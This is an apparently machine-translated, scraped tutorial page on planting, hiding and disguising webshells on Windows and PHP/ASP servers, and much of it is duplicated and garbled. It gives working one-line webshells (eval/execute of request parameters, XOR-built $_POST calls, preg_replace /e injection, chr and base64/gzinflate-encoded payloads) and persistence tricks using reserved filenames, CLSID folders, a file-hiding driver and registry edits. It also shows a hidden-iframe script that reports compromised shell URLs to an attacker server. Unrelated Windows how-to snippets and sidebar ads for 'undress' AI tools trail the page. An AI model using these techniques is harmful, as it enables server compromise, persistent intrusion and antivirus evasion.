file:///C:UsersSAKAIY~1 AppDataLocalTempmsohtmlclip11clip_image022.jpgcreated in c drive an aux.asp. This file cannot be deleted in the graphical interface. file:///C:UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image023.pngTo delete, you must use the del command. file:///C:UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image024.pngThere is no prompt after deletion, but the file is indeed gone. Of course, although this method can be used to create a webshell that cannot be deleted through the graphical interface, if it is placed directly in the root directory of the web page, it will still be deleted if an experienced network administrator sees it. ②clsid hidden
Every program in windows has a clsid. If you name a folder x.{program clsid}, then enter two commands: file:///C:UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image026. jpgAfter creationfile:///C:UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image027.png
click to enter the control panel, but in fact the file is still a folder, and Malaysia still exists in it, and create a Naming such a folder with a clsid as a corresponding program can confuse network administrators. For example, enter the recycle bin folder to create such a folder with a recycle bin clsid, and copy a reserved word in it. asp, you can also use
Default
1
attrib+ h+s+r+d/s/d
Modify the properties of the file and hide it. Generally, Windows does not display hidden files by default, and the recycle bin folder is automatically created, so that an immortal webshell can be hidden in the server.
③Drive hiding technology
The principle is that in the Windows file system, when a folder is opened, the system will send an IRP_MJ_DIRECTORY_CONTROL function. This function can allocate a buffer to traverse the subfolders under the folder. The obtained information is stored in the buffer. When traversing, it looks for matching file names. If the file names match, the current folder or file is bypassed. Regarding the principle of bypass, I queried the code. According to my understanding, It adds the offset of the file based on the traversed pointer when querying the target file, and skips directly without scanning the target folder. For the implementation of this technology, although there are many C source codes on the Internet, it is difficult to operate because of the support of header files and system support (the file systems of different systems will be different). I found Easy on the Internet The File Locker program needs to be installed on the web server and set permissions on the target file.
Default
1
file:///C: UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image028.png
Permission settings include readable, writable, deletable, and visible.
Default
1
file:///C: UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image030.jpg
You can see from the above picture that we have hidden it. As mentioned above, because the traversal is directly bypassed, the absolute path can be accessed. My understanding is:
Default
WINDOWS
xlkfs
.dat
c:
WINDOWS
xlkfs.dllc:WIND OWS
xlkfs.ini c:WINDOWS
system32driversxlkfs.sys
These 4 files replace traversal Query, to access hidden files, entering the absolute path does not apply absolute path query, but queries through the above four files, which is equivalent to making a separate driver for hidden files.
In order not to be discovered by the administrator, you can delete the Easy FileLocker program, but you cannot delete the above 4 files. After deleting the program, you can still access it by entering the absolute path, which achieves the function of hiding the backdoor④Registry hidingRegistry path: HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionexplorer\AdvancedFolderHiddenSHOWALLThere is a CheckedValue key under this path, put it Change it to 0. If there is no CheckValue key, create one directly and assign it a value of 0. Then the created hidden files will be completely hidden. Even if "Show all files" is turned on under the folder options, it will not be displayed. (2) Hiding of one-sentence Trojans①Header file inclusion hiding
In some script files in the web, some files have include statements. You can use this inclusion method to include one-sentence files. When accessing this page These sentences will be called directly. asp includes the statement: , fill in the path directly, and the file path is the path on the web server.
You can use Webmaster Stop to write a sentence of NTFS stream pony into the image. After writing the ‘’ to ‘:’ in the path, the image will not be displayed, and then find
Go to an asp file on the web server and write an include statement at the beginning of the file, php include statement:
Default
1
include($include
);?>
$include here can be an external path such as:
http://www.aaa.com/1.php?Include=http://www.bbb.com/hehe.php
This aaa The content of 1.php on is
Default
1
include($include);?>
means inclusion. bbb is an external server, provided that this server cannot support PHP. Otherwise, hehe.php (that is, one sentence horse) will be executed on the bbb server, but aaa will not be executed.
②Configuration file hidden sentence (PHP)
After getting the PHP webshell, you can use php.ini to hide files and edit configuration files. One of the functions is to add the contents of a certain file to any interface. Header and footer: auto_prepend_file =hehe.phpThen look at include_path = “E:PHPnow-1.5.6htdocs;”This configuration information indicates the location of the collection where the header and footer are loaded, path The rule is "path1;path2", which means adding the header and footer files in the folder of path1 to the files in path, because here is a '.' indicating the root path, which is equivalent to adding it to the homepage. Go there, and then write a sentence in the hehe.asp file, you can add the header function through php and write the sentence into the homepage of the website. ③404 Pony
404 Pony displays a 404 page that does not exist when accessing, but in fact the Trojan code has been executed. Generally, it can be called out by pressing shift 5 times. 4. One sentence about webshell to avoid killing
1. Construction method to bypass detection (PHP)
General detection programs will filter characters like "_POST", "system", "call_user_func_array", this Sometimes you can use construction methods to bypass some detection programs. The basic principle is that each character in PHP corresponds to a binary value. You can use the XOR method to make one character in the horse use the XOR value of two characters. to replace. For example, like the code
Default
@ +$ _ ++
; // Here ++ let '_' 自 1 $ __ = ( "#" ^ "|"
) ;
$__=("/"^"`");
$__= ("|"^"/"); "{"^"/" );
Then the structure and a sentence can be written as
Default
@$_
++;
$__=
("#"^
"|").("." ^"~").("/"^"`"
).("|"^"/").("{"^ "/"); // The value of $__ is _POST @${$__}[!$_](${$__}[$_]); ?> ;
//The result is @$_POST[0]($POST[ 1])!$_ represents the opposite of 1. In the language, 1 represents true, and the converse is 0 (false)But this bypass method is quite weak. If you think about it carefully, even if it is two characters Binary values are "~").("/"^"`").("|"^"/").("{"^"/")1 $__=(
"#"^ "|" ).
("."^"~")
.
("/"^"`" ).("|"^"/"
).("{"^"/"
)
The binary value of
will be detected twice. The value of the hexadecimal code will still be Kill. 2. Regular expression replacement method (PHP) There is a function preg_replace() in php, which can realize the replacement of regular expressions. Using substitution to bypass the detection system also requires a function feature in the PHP scripting language. When the function is called, if the value assigned to the formal parameter in the function contains a command, the command will be executed. Default(.+?)/ies",'funfunc("1")', $_POST["cmd"]);
?>1234
function funfunc
($str){
}
echopreg_replace("/
(.+?) /ies",'funfunc("1")',$_POST
["cmd"
]);
?>
The above code is a process of replacement. First, create an empty function, and then use the preg_replace function to replace the
{${phpinfo()}}
(of course the phpinfo() here can be replaced with other commands), through replacement, it will become Into funfunc({${phpinfo()}})Since ${} can parse the content in {}, the phpinfo here can be executed smoothly. 3. Instant generation method (PHP)
When using header file inclusion, the included header file php is easily scanned by the scanner. At this time, you can use file_put_content to create a file with a sentence like php written in it. . Generate the horse before accessing it, but this function is sensitive and can be easily killed. 4. Avoidance method (asp)
Because some asp servers will filter in order to prevent one-line spam, you can use:
Default
1
scriptlanguage=VBScriptrunat =server> execute request("cmd")/Script>
The functions are the same, Just change the form. Avoid specific script language: aspx one sentence
Default
1
<script>language<span>=<span>"C#"<span><span>runat <span>=<span>"server"<span>><span> WebAdmin2Y<span>.<span>x<span>.<span>y<span><span>aaaaa<span><span>=<span><span>new<span><span>WebAdmin2Y<span>.<span>x<span>.<span>y<span>(<span>"add6bb58e139be10"<span>)<span>; <span></script>
这里使用C#语言写一句话马。5.拆分法(asp)
将拆分为,虽然绕过的可能性很小,但是也是一种绕过手法,也许有的服务器,做了很多高大上的扫描方式,但是遗漏小的问题。还有拆分法加强版:
Default
12
IfRequest("MH")""ThenExecute(Request("MH"))%>
ifrequest("MH")""thensession("MH")=request("MH"):endif:ifsession("MH")""thenexecutesession("MH")%>
以上两句使用了if一句将其分开,中心思想将敏感字符拆分,因为一般asp特征码为eval(request或者execute(request,拆分了之后检测不到特征码,就直接绕过了。6.乱码变形(ANSI->Unicode加密)
Default
1
evalrequest("#")%>变形为“┼攠數畣整爠煥敵瑳∨∣┩愾”
Default
1
eval(eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("brute"))%>
上面一行代码是采用了ascii加密的方法,chr(114)代表的是ascii中的编号为114个那个字符,即r。上述代码转换后的代码为
Default
1
eval(eval(request("brute"))%>
7. Malaysia’s anti-virus protection
(1) base4code encoding
Malaysia’s anti-virus protection can be compressed by compressing the Malaysian code, and then perform the base4 encryption algorithm after compression, and then add the Malaysian code at the end Add
Default
1
@eval(gzinflate (base64_decode($code)));
You can execute the script. Among them, the $code variable is used to store the base4 code. During execution, it is first decompressed by gzinflate and executed in eval. In fact, this cannot be truly protected from killing, as base4code and eval are still included in the signature list, and will also be killed when passing through the scanner. (2) ROT13 encoding (php)
str_rot13 is a function used by php for encoding. It can be used to encode script code to bypass signature detection, for example. file:///C:UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image031.pngThe strrev function in the picture is used to reverse characters. In order to escape the detection of the signature, the characters are specially separated with '.' signs. The characters encrypted by the three str_rot13 in the picture are gzinflate, str_rot13, base64_decode in order, which is equivalent to triple encryption, and also avoids the two feature codes of gzinflate and base64_decode. But there is no avoiding str_rot13. It is possible that some anti-virus software will also use str_rot13 as a feature code. ROT13 becomes rotation 13, which means that the current character’s position value in the alphabet minus 13 is encrypted. Encrypt it twice and it will return to its original value. However, due to the fixed algorithm, the encryption strength is not strong. And the method of cracking is extremely simple, just encrypt one side. (3) Other encodings
Generally, anti-virus software and scanners will use signature codes to determine whether there are viruses. When doing anti-virus processing for Malaysian or small horses, or in one sentence, php or asp scripts are usually used. Encryption functions can be used to bypass scanners (such as base4, rot13, etc.), but I think you can write your own encryption algorithm, and then use your own encryption algorithm to encrypt script code to bypass some feature codes. You can use some ideas of encryption methods such as Caesar cipher and shift encryption, write an encryption algorithm, and then encrypt the script code. Then feature codes such as base4 and rot3 will disappear, or you can use homemade encryption directly without any trouble. The algorithm encrypts the signature and then decrypts it when used. You can also use key encryption algorithms such as DES and RSA. Generally, Malaysia will have a password login box. You can link the password of the login script with the decryption key, and it can be parsed only after entering the correct password. , on the one hand, it is to avoid detection by scanners and anti-virus software, and on the other hand, it is convenient. Even if this Malaysia is obtained by others, they cannot decrypt it and see the source code. 5. About the backdoor of webshell
Generally, the Malaysian downloaded online will have more or less backdoors. These backdoors directly lead to the website we downloaded being taken away by others, so the Malaysian downloaded online must first Check for backdoors. For example, the universal password here:
Default
1234567
end function
ifsession ( "hehe") ""then
ifrequest.form("pass")=userpassor request.form ("pass")
= "1111111" hThensession ( "hehe" ) = UserPassSS response.redirect urlelse
here
Default
1
request.form ("pass")=userpass
was originally used to verify the value of pass. If the entered pass value is equal to userpass, it means Verification is successful, but later
Default
1
orrequest. from(“pass”)=”1111111”
means if the entered pass value is 111111 1. You can also log in to Malaysia. Of course, this place can't be that simple. The original author can assign the userpass value to two and add one
The trigger condition for userpass change is triggered when he logs in (for example, if the login fails, the update of userpass value will be triggered), so that you can add a suffix, and
Moreover, the trigger condition code and the verification code are far apart and difficult to find. At this time, we need to analyze the Malaysian code line by line.
Then use the frame to mount the horse:
Default
1
iframe src=backdoor addresswidth=0height=0>/iframe >
In this place, set the link address width and height to 0, and the page will be hidden. The "backdoor address" inside points to your own script receiver, and finally you put the receiving script on a public network server you built. The receiving script is as follows:
Default
url
=Request .ServerVariables
("HTTP_Referer")setfs
=server.
CreateObject ("Scripting.FileSystemObject") setfile
=fs.OpenTextFile(server.MapPath("hehe.txt") ,8,True)
file.writelineurl file.closeset file=nothing
setfs=nothing
%>
where
Default
1
url=Request .ServerVariables("HTTP_Referer")
represents the requested character to the content, that is, the Malaysian url address, and then The url address is saved to the current hehe.txt of the directory.
To propose this kind of backdoor, you must first destroy the second type of password authentication in Malaysia, which is the master password. Delete the relevant function code, and then check to see if there is an ASP Malaysia page with a hidden URL such as width=0 height=0, find it and delete it.
The above has introduced the implementation and hidden exploration of Webshell, including aspects of it. I hope it will be helpful to friends who are interested in PHP tutorials.
3. The "security" of webshell
1. Regarding the hiding of webshell
(1) Malaysia’s hidden
①Undead zombies
Windows system has system reserved folder names. Windows does not allow these names to be used to name folders. Reserved folders: aux|prn|con|nul|com1|com2 |com3|com4|com5|com6|com7|com8|com9|lpt1|lpt2|lpt3|lpt4|lpt5|lpt6|lpt7|lpt8|lpt. But these can be created using the windows copy command, such as:
Default
|
1
|
c:>copy3.asp.C:aux.asp |
file:///C:UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image020.png
file:///C:UsersSAKAIY~1 AppDataLocalTempmsohtmlclip11clip_image022.jpgcreated in c drive an aux.asp. This file cannot be deleted in the graphical interface.file:///C:UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image023.pngTo delete, you must use the del command.file:///C:UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image024.pngThere is no prompt after deletion, but the file is indeed gone.Of course, although this method can be used to create a webshell that cannot be deleted through the graphical interface, if it is placed directly in the root directory of the web page, it will still be deleted if an experienced network administrator sees it.②clsid hidden
Every program in windows has a clsid. If you name a folder x.{program clsid}, then enter two commands:file:///C:UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image026. jpgAfter creationfile:///C:UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image027.pngclick to enter the control panel, but in fact the file is still a folder, and Malaysia still exists in it, and create a Naming such a folder with a clsid as a corresponding program can confuse network administrators. For example, enter the recycle bin folder to create such a folder with a recycle bin clsid, and copy a reserved word in it. asp, you can also use
Default
attrib+ h+s+r+d/s/d
Modify the properties of the file and hide it. Generally, Windows does not display hidden files by default, and the recycle bin folder is automatically created, so that an immortal webshell can be hidden in the server.
③Drive hiding technology
The principle is that in the Windows file system, when a folder is opened, the system will send an IRP_MJ_DIRECTORY_CONTROL function. This function can allocate a buffer to traverse the subfolders under the folder. The obtained information is stored in the buffer. When traversing, it looks for matching file names. If the file names match, the current folder or file is bypassed. Regarding the principle of bypass, I queried the code. According to my understanding, It adds the offset of the file based on the traversed pointer when querying the target file, and skips directly without scanning the target folder.For the implementation of this technology, although there are many C source codes on the Internet, it is difficult to operate because of the support of header files and system support (the file systems of different systems will be different). I found Easy on the Internet The File Locker program needs to be installed on the web server and set permissions on the target file.Default
file:///C: UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image028.png
Permission settings include readable, writable, deletable, and visible.Default
file:///C: UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image030.jpg
You can see from the above picture that we have hidden it. As mentioned above, because the traversal is directly bypassed, the absolute path can be accessed. My understanding is:Default
WINDOWS
xlkfs
.dat
You can use Webmaster Stop to write a sentence of NTFS stream pony into the image. After writing the ‘’ to ‘:’ in the path, the image will not be displayed, and then find Go to an asp file on the web server and write an include statement at the beginning of the file, php include statement: WINDOWS asp includes the statement: , fill in the path directly, and the file path is the path on the web server.xlkfs.dllc:WIND OWS
xlkfs.ini c:WINDOWS
system32driversxlkfs.sys
These 4 files replace traversal Query, to access hidden files, entering the absolute path does not apply absolute path query, but queries through the above four files, which is equivalent to making a separate driver for hidden files. In order not to be discovered by the administrator, you can delete the Easy FileLocker program, but you cannot delete the above 4 files. After deleting the program, you can still access it by entering the absolute path, which achieves the function of hiding the backdoor④Registry hidingRegistry path: HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionexplorer\AdvancedFolderHiddenSHOWALLThere is a CheckedValue key under this path, put it Change it to 0. If there is no CheckValue key, create one directly and assign it a value of 0. Then the created hidden files will be completely hidden. Even if "Show all files" is turned on under the folder options, it will not be displayed. (2) Hiding of one-sentence Trojans①Header file inclusion hiding
In some script files in the web, some files have include statements. You can use this inclusion method to include one-sentence files. When accessing this page These sentences will be called directly.Default1include($include
);?>
$include here can be an external path such as:
http://www.aaa.com/1.php?Include=http://www.bbb.com/hehe.phpThis aaa The content of 1.php on is
Default
include($include);?>
means inclusion. bbb is an external server, provided that this server cannot support PHP. Otherwise, hehe.php (that is, one sentence horse) will be executed on the bbb server, but aaa will not be executed.
②Configuration file hidden sentence (PHP)
After getting the PHP webshell, you can use php.ini to hide files and edit configuration files. One of the functions is to add the contents of a certain file to any interface. Header and footer:auto_prepend_file =hehe.phpThen look atinclude_path = “E:PHPnow-1.5.6htdocs;”This configuration information indicates the location of the collection where the header and footer are loaded, path The rule is "path1;path2", which means adding the header and footer files in the folder of path1 to the files in path, because here is a '.' indicating the root path, which is equivalent to adding it to the homepage. Go there, and then write a sentence in the hehe.asp file, you can add the header function through php and write the sentence into the homepage of the website.③404 Pony
404 Pony displays a 404 page that does not exist when accessing, but in fact the Trojan code has been executed. Generally, it can be called out by pressing shift 5 times.4. One sentence about webshell to avoid killing
1. Construction method to bypass detection (PHP)
General detection programs will filter characters like "_POST", "system", "call_user_func_array", this Sometimes you can use construction methods to bypass some detection programs. The basic principle is that each character in PHP corresponds to a binary value. You can use the XOR method to make one character in the horse use the XOR value of two characters. to replace.For example, like the codeDefault
@ +$ _ )++
;// Here ++ let '_' 自 1$ __= ("#" ^ "|";
$__=("/"^"`");
$__= ("|"^"/"); "{"^"/" );
Then the structure and a sentence can be written as
Default
@$_
++;
("."^"~"). ( $__="#" "|"^
"|").("." ^"~").("/"^"`"
).("|"^"/").("{"^ "/"); // The value of $__ is _POST @${$__}[!$_](${$__}[$_]); ?> ;
//The result is @$_POST[0]($POST[ 1])!$_ represents the opposite of 1. In the language, 1 represents true, and the converse is 0 (false)But this bypass method is quite weak. If you think about it carefully, even if it is two characters Binary values are "~").("/"^"`").("|"^"/").("{"^"/")1 $__=(
"#"^)
.
("/"^"`" ).("|"^"/"
).("{"^"/"
)($str)
funfunc The binary value of functionwill be detected twice. The value of the hexadecimal code will still be Kill. 2. Regular expression replacement method (PHP) There is a function preg_replace() in php, which can realize the replacement of regular expressions. Using substitution to bypass the detection system also requires a function feature in the PHP scripting language. When the function is called, if the value assigned to the formal parameter in the function contains a command, the command will be executed. Default(.+?)/ies",'funfunc("1")', $_POST["cmd"]); ?>1234
{
}echopreg_replace("/
(.+?) /ies",'funfunc("1")',$_POST
["cmd"
])
; ?>
The above code is a process of replacement. First, create an empty function, and then use the preg_replace function to replace the(here is the theme in html) in the form cmd with funfunc. The value in the post form is written as {${phpinfo()}} (of course the phpinfo() here can be replaced with other commands), through replacement, it will become Intofunfunc({${phpinfo()}})Since ${} can parse the content in {}, the phpinfo here can be executed smoothly.3. Instant generation method (PHP)
When using header file inclusion, the included header file php is easily scanned by the scanner. At this time, you can use file_put_content to create a file with a sentence like php written in it. . Generate the horse before accessing it, but this function is sensitive and can be easily killed.4. Avoidance method (asp)
Because some asp servers will filter in order to prevent one-line spam, you can use:Default
scriptlanguage=VBScriptrunat =server> execute request("cmd")/Script>
The functions are the same, Just change the form.Avoid specific script language: aspx one sentenceDefault
<script>language<span>=<span>"C#"<span><span>runat <span>=<span>"server"<span>><span> WebAdmin2Y<span>.<span>x<span>.<span>y<span><span>aaaaa<span><span>=<span><span>new<span><span>WebAdmin2Y<span>.<span>x<span>.<span>y<span>(<span>"add6bb58e139be10"<span>)<span>; <span></script>
这里使用C#语言写一句话马。5.拆分法(asp)
将拆分为,虽然绕过的可能性很小,但是也是一种绕过手法,也许有的服务器,做了很多高大上的扫描方式,但是遗漏小的问题。还有拆分法加强版:Default
IfRequest("MH")""ThenExecute(Request("MH"))%>
ifrequest("MH")""thensession("MH")=request("MH"):endif:ifsession("MH")""thenexecutesession("MH")%>
以上两句使用了if一句将其分开,中心思想将敏感字符拆分,因为一般asp特征码为eval(request或者execute(request,拆分了之后检测不到特征码,就直接绕过了。6.乱码变形(ANSI->Unicode加密)
Default
evalrequest("#")%>变形为“┼攠數畣整爠煥敵瑳∨∣┩愾”
Default
eval(eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("brute"))%>
上面一行代码是采用了ascii加密的方法,chr(114)代表的是ascii中的编号为114个那个字符,即r。上述代码转换后的代码为Default
eval(eval(request("brute"))%>
7. Malaysia’s anti-virus protection
(1) base4code encoding
Malaysia’s anti-virus protection can be compressed by compressing the Malaysian code, and then perform the base4 encryption algorithm after compression, and then add the Malaysian code at the end Add
Default
@eval(gzinflate (base64_decode($code)));
You can execute the script. Among them, the $code variable is used to store the base4 code. During execution, it is first decompressed by gzinflate and executed in eval. In fact, this cannot be truly protected from killing, as base4code and eval are still included in the signature list, and will also be killed when passing through the scanner.(2) ROT13 encoding (php)
str_rot13 is a function used by php for encoding. It can be used to encode script code to bypass signature detection, for example.file:///C:UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image031.pngThe strrev function in the picture is used to reverse characters. In order to escape the detection of the signature, the characters are specially separated with '.' signs.The characters encrypted by the three str_rot13 in the picture are gzinflate, str_rot13, base64_decode in order, which is equivalent to triple encryption, and also avoids the two feature codes of gzinflate and base64_decode. But there is no avoiding str_rot13. It is possible that some anti-virus software will also use str_rot13 as a feature code.ROT13 becomes rotation 13, which means that the current character’s position value in the alphabet minus 13 is encrypted. Encrypt it twice and it will return to its original value. However, due to the fixed algorithm, the encryption strength is not strong. And the method of cracking is extremely simple, just encrypt one side.(3) Other encodings
Generally, anti-virus software and scanners will use signature codes to determine whether there are viruses. When doing anti-virus processing for Malaysian or small horses, or in one sentence, php or asp scripts are usually used. Encryption functions can be used to bypass scanners (such as base4, rot13, etc.), but I think you can write your own encryption algorithm, and then use your own encryption algorithm to encrypt script code to bypass some feature codes. You can use some ideas of encryption methods such as Caesar cipher and shift encryption, write an encryption algorithm, and then encrypt the script code. Then feature codes such as base4 and rot3 will disappear, or you can use homemade encryption directly without any trouble. The algorithm encrypts the signature and then decrypts it when used.You can also use key encryption algorithms such as DES and RSA. Generally, Malaysia will have a password login box. You can link the password of the login script with the decryption key, and it can be parsed only after entering the correct password. , on the one hand, it is to avoid detection by scanners and anti-virus software, and on the other hand, it is convenient. Even if this Malaysia is obtained by others, they cannot decrypt it and see the source code.5. About the backdoor of webshell
Generally, the Malaysian downloaded online will have more or less backdoors. These backdoors directly lead to the website we downloaded being taken away by others, so the Malaysian downloaded online must first Check for backdoors.For example, the universal password here:Default
end function
ifsession ( "hehe") ""then
ifrequest.form("pass")=userpassor request.form ("pass")
="1111111" hThensession ( "hehe" ) = UserPassSS response.redirect urlelse
here
Default
request.form ("pass")=userpass
was originally used to verify the value of pass. If the entered pass value is equal to userpass, it means Verification is successful, but later
Default
orrequest. from(“pass”)=”1111111”
means if the entered pass value is 111111 1. You can also log in to Malaysia. Of course, this place can't be that simple. The original author can assign the userpass value to two and add one The trigger condition for userpass change is triggered when he logs in (for example, if the login fails, the update of userpass value will be triggered), so that you can add a suffix, and Moreover, the trigger condition code and the verification code are far apart and difficult to find. At this time, we need to analyze the Malaysian code line by line.Then use the frame to mount the horse:
Default
iframe src=backdoor addresswidth=0height=0>/iframe >
In this place, set the link address width and height to 0, and the page will be hidden. The "backdoor address" inside points to your own script receiver, and finally you put the receiving script on a public network server you built. The receiving script is as follows:
Default
url
=Request . =ServerVariables
("HTTP_Referer")setfsserver .
CreateObject ("Scripting.FileSystemObject") setfile
=fs.OpenTextFile(server.MapPath("hehe.txt") ,8,True)
file.writelineurl file.closeset file=nothing
setfs=nothing
%>
where
Default
1url=Request .ServerVariables("HTTP_Referer")
represents the requested character to the content, that is, the Malaysian url address, and then The url address is saved to the current hehe.txt of the directory.
To propose this kind of backdoor, you must first destroy the second type of password authentication in Malaysia, which is the master password. Delete the relevant function code, and then check to see if there is an ASP Malaysia page with a hidden URL such as width=0 height=0, find it and delete it.The above has introduced the implementation and hidden exploration of Webshell, including aspects of it. I hope it will be helpful to friends who are interested in PHP tutorials.
解决方法:您的组织要求您更改 PIN 码Oct 04, 2023 pm 05:45 PM“你的组织要求你更改PIN消息”将显示在登录屏幕上。当在使用基于组织的帐户设置的电脑上达到PIN过期限制时,就会发生这种情况,在该电脑上,他们可以控制个人设备。但是,如果您使用个人帐户设置了Windows,则理想情况下不应显示错误消息。虽然情况并非总是如此。大多数遇到错误的用户使用个人帐户报告。为什么我的组织要求我在Windows11上更改我的PIN?可能是您的帐户与组织相关联,您的主要方法应该是验证这一点。联系域管理员会有所帮助!此外,配置错误的本地策略设置或不正确的注册表项也可能导致错误。即
Windows 11 上调整窗口边框设置的方法:更改颜色和大小Sep 22, 2023 am 11:37 AMWindows11将清新优雅的设计带到了最前沿;现代界面允许您个性化和更改最精细的细节,例如窗口边框。在本指南中,我们将讨论分步说明,以帮助您在Windows操作系统中创建反映您的风格的环境。如何更改窗口边框设置?按+打开“设置”应用。WindowsI转到个性化,然后单击颜色设置。颜色更改窗口边框设置窗口11“宽度=”643“高度=”500“>找到在标题栏和窗口边框上显示强调色选项,然后切换它旁边的开关。若要在“开始”菜单和任务栏上显示主题色,请打开“在开始”菜单和任务栏上显示主题
如何在 Windows 11 上更改标题栏颜色?Sep 14, 2023 pm 03:33 PM默认情况下,Windows11上的标题栏颜色取决于您选择的深色/浅色主题。但是,您可以将其更改为所需的任何颜色。在本指南中,我们将讨论三种方法的分步说明,以更改它并个性化您的桌面体验,使其具有视觉吸引力。是否可以更改活动和非活动窗口的标题栏颜色?是的,您可以使用“设置”应用更改活动窗口的标题栏颜色,也可以使用注册表编辑器更改非活动窗口的标题栏颜色。若要了解这些步骤,请转到下一部分。如何在Windows11中更改标题栏的颜色?1.使用“设置”应用按+打开设置窗口。WindowsI前往“个性化”,然
OOBELANGUAGE错误Windows 11 / 10修复中出现问题的问题Jul 16, 2023 pm 03:29 PM您是否在Windows安装程序页面上看到“出现问题”以及“OOBELANGUAGE”语句?Windows的安装有时会因此类错误而停止。OOBE表示开箱即用的体验。正如错误提示所表示的那样,这是与OOBE语言选择相关的问题。没有什么可担心的,你可以通过OOBE屏幕本身的漂亮注册表编辑来解决这个问题。快速修复–1.单击OOBE应用底部的“重试”按钮。这将继续进行该过程,而不会再打嗝。2.使用电源按钮强制关闭系统。系统重新启动后,OOBE应继续。3.断开系统与互联网的连接。在脱机模式下完成OOBE的所
Windows 11 上启用或禁用任务栏缩略图预览的方法Sep 15, 2023 pm 03:57 PM任务栏缩略图可能很有趣,但它们也可能分散注意力或烦人。考虑到您将鼠标悬停在该区域的频率,您可能无意中关闭了重要窗口几次。另一个缺点是它使用更多的系统资源,因此,如果您一直在寻找一种提高资源效率的方法,我们将向您展示如何禁用它。不过,如果您的硬件规格可以处理它并且您喜欢预览版,则可以启用它。如何在Windows11中启用任务栏缩略图预览?1.使用“设置”应用点击键并单击设置。Windows单击系统,然后选择关于。点击高级系统设置。导航到“高级”选项卡,然后选择“性能”下的“设置”。在“视觉效果”选
Windows 11 上的显示缩放比例调整指南Sep 19, 2023 pm 06:45 PM在Windows11上的显示缩放方面,我们都有不同的偏好。有些人喜欢大图标,有些人喜欢小图标。但是,我们都同意拥有正确的缩放比例很重要。字体缩放不良或图像过度缩放可能是工作时真正的生产力杀手,因此您需要知道如何对其进行自定义以充分利用系统功能。自定义缩放的优点:对于难以阅读屏幕上的文本的人来说,这是一个有用的功能。它可以帮助您一次在屏幕上查看更多内容。您可以创建仅适用于某些监视器和应用程序的自定义扩展配置文件。可以帮助提高低端硬件的性能。它使您可以更好地控制屏幕上的内容。如何在Windows11
10种在 Windows 11 上调整亮度的方法Dec 18, 2023 pm 02:21 PM屏幕亮度是使用现代计算设备不可或缺的一部分,尤其是当您长时间注视屏幕时。它可以帮助您减轻眼睛疲劳,提高易读性,并轻松有效地查看内容。但是,根据您的设置,有时很难管理亮度,尤其是在具有新UI更改的Windows11上。如果您在调整亮度时遇到问题,以下是在Windows11上管理亮度的所有方法。如何在Windows11上更改亮度[10种方式解释]单显示器用户可以使用以下方法在Windows11上调整亮度。这包括使用单个显示器的台式机系统以及笔记本电脑。让我们开始吧。方法1:使用操作中心操作中心是访问
如何在Safari中关闭iPhone的隐私浏览身份验证?Nov 29, 2023 pm 11:21 PM在iOS17中,Apple为其移动操作系统引入了几项新的隐私和安全功能,其中之一是能够要求对Safari中的隐私浏览选项卡进行二次身份验证。以下是它的工作原理以及如何将其关闭。在运行iOS17或iPadOS17的iPhone或iPad上,如果您在Safari浏览器中打开了任何“无痕浏览”标签页,然后退出会话或App,Apple的浏览器现在需要面容ID/触控ID认证或密码才能再次访问它们。换句话说,如果有人在解锁您的iPhone或iPad时拿到了它,他们仍然无法在不知道您的密码的情况下查看您的隐私
Hot AI Tools
Undresser.AI Undress
AI-powered app for creating realistic nude photos
AI Clothes Remover
Online AI tool for removing clothes from photos.
Undress AI Tool
Undress images for free
Clothoff.io
AI clothes remover
AI Hentai Generator
Generate AI Hentai for free.
Hot Article
Hot Tools
Dreamweaver Mac version
Visual web development tools
VSCode Windows 64-bit Download
A free and powerful IDE editor launched by Microsoft
MinGW - Minimalist GNU for Windows
This project is in the process of being migrated to osdn.net/projects/mingw, you can continue to follow us there. MinGW: A native Windows port of the GNU Compiler Collection (GCC), freely distributable import libraries and header files for building native Windows applications; includes extensions to the MSVC runtime to support C99 functionality. All MinGW software can run on 64-bit Windows platforms.
PhpStorm Mac version
The latest (2018.2.1) professional PHP integrated development tool
SAP NetWeaver Server Adapter for Eclipse
Integrate Eclipse with SAP NetWeaver application server.
